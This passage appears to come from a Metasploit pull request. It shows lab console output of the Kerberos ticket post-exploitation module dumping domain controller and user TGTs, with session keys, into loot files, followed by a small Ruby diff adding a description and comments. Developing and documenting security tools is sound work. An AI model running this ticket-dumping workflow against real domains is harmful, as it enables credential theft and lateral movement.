RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA== +[*] LogonSession LUID: 0x0000003e4 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Service (5) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 09:32:46 -0400 + End time: 2023-08-23 19:32:46 -0400 + Renew Till: 2023-08-30 09:32:46 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ== +[*] Ticket[1] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 09:32:46 -0400 + End time: 2023-08-23 19:32:46 -0400 + Renew Till: 2023-08-30 09:32:46 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ== +[*] LogonSession LUID: 0x00004ff91 +[*] User: MSFLAB\smcintyre +[*] Session: 1 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:33:18 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin + Primary Principal: smcintyre@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: smcintyre@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: 074bf82534302378dd8d8f911ddab2afbf64b32e8093e4fdd833e683e427c361 + Subkey: false + Ticket Length: 1052 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:18 -0400 + End time: 2023-08-23 18:33:18 -0400 + Renew Till: 2023-08-30 08:33:18 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + oRWAAGpgwUBqsOzC3Xq8U5cNzsuFjB0ZLIgml5HqoGPgRwMtaDs9YIPNGudWsIvu+zl1aAIY6bkw3ltzW4/Ay2IuqQXKAMVnaWhTLWMNYViyPX4lUw5vrOvR6fpshI3tx46aqXNO5hnHPmNg+zAP9nKwXNG4hj3WtdCM3NMaLGShnQhvt9RnN/rEHuOQGn9Uo+3fEO01juPq9PBMJ/HGhe6dLXWFaXUc7OscSTQ5LUTlz+ABdbz2G0wCleEJPJYsQEo0tC1XDcZRcTsMkgbrAxp3H3zQGubEmX3h36Fo2H6ftYT0NsjnU1z/keylopjV6v0aRADUnqfJs+DgevOBDF0Ccy8IRsDdDVlnxr4tK7QwOvFUuIWKEPsLM2eLesNC7yJWnkDyHiFns+PNaz1PSIoD+euNRHFqW+7cPJXro3r84UcEiukKbWrMbrkg/YSQcEr9yGikNuoWSzgYCtbMsSLBRO7JasRcSNL+p4Dc3+E5r2nWRoR9bZTQM4YM72/kzoaXXnXXuPVx2krpohGMNJIHXoQ6drqCNwYcdT/tGMoCY+BLe29/PAtywGK3Hiq3HhbDnQ8t1g63b7CTssT0edrKR72Bv/YveDn3XQ1iKNM4mot+UxGVjrStJTQ6eEp1r3ZTibSvVTn3T5E1Z3ljSyHYhIa8bGlh2Ysk2St3ZEv3emDwDXvPIGovbzkqE7NYQgPlh36siynCV2SUKj1bApWA7erk7fVTyM/swH7OFa+ekZ+J88F02fanFtvrxGOhKOBfYL50UAas5o+32cqgIrPlip6JXe3BZ2fpr71mcZo4YYzUxopFYbox3FdH95HdQVG7PNg93e3+2XvnrkWEc2md+UhYacKvMMBrXzGAz1d+ea/V3Yt2EgZc1WWAWoKVCfw6RUeTQVs2pWjq7j2APjhzjAEa4s543xgmT0jIHZnfkGzTwjM5f5mhj1KeFkff98pEQX+QjjBFnaRDnIkBmzRmAyJNzxjwAhiW/RNxYNYG3UOnpmxxV443vN3wr3e+MFvBG9azFlq36iWs+2jGNUuFTdH6RECf7/tNun+DE622vI1hIaBJLAHMHzdSIt9kLTQ+OzECGjH0QNRHHibwLhyR36UHShr/ei4/PO87kKw+ZVpb0rHNcICaT80MhCIGWLlH5SErAKQe/vOkDgqeLW+keCbZfW8F7QBXc6C9kUpzUQuIII7KvLKskbgwhqPhoVV70x9vFXWG1xSFwzPJdQmDRBanyQ0xoQFhmt2MO6lMRXTpheAAL+uBJOpgYWX5GBA= +[*] LogonSession LUID: 0x00004d345 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:18 -0400 +[*] LogonSession LUID: 0x00004bfb9 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] Post module execution completed +msf6 post(windows/manage/kerberos_tickets) > klist +Kerberos Cache +============== +id host principal sname issued status path +-- ---- --------- ----- ------ ------ ---- +398 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin +399 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin +400 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin +401 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin +404 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:18 -0400 active /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin +402 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin +403 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin + +msf6 post(windows/manage/kerberos_tickets) > +``` diff --git a/modules/post/windows/manage/kerberos_tickets.rb b/modules/post/windows/manage/kerberos_tickets.rb index ea768f65c3..7f426bafc2 100644 --- a/modules/post/windows/manage/kerberos_tickets.rb +++ b/modules/post/windows/manage/kerberos_tickets.rb @@ -38,6 +38,7 @@ class MetasploitModule < Msf::Post info, 'Name' => 'Kerberos Ticket Management', 'Description' => %q{ + Manage kerberos tickets on a compromised host. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -278,6 +279,8 @@ class MetasploitModule < Msf::Post def print_logon_session_summary(logon_session_data_ptr, annotation: nil) sid = '???' if datastore['VERBOSE'] && logon_session_data_ptr.contents.psid != 0 + # reading the SID requires 3 railgun calls so only do it in verbose mode to speed things up + # reading the data directly wouldn't be much faster because SIDs are of a variable length result = session.railgun.advapi32.ConvertSidToStringSidA(logon_session_data_ptr.contents.psid.to_i, 4) if result sid = session.railgun.util.read_string(result['StringSid'])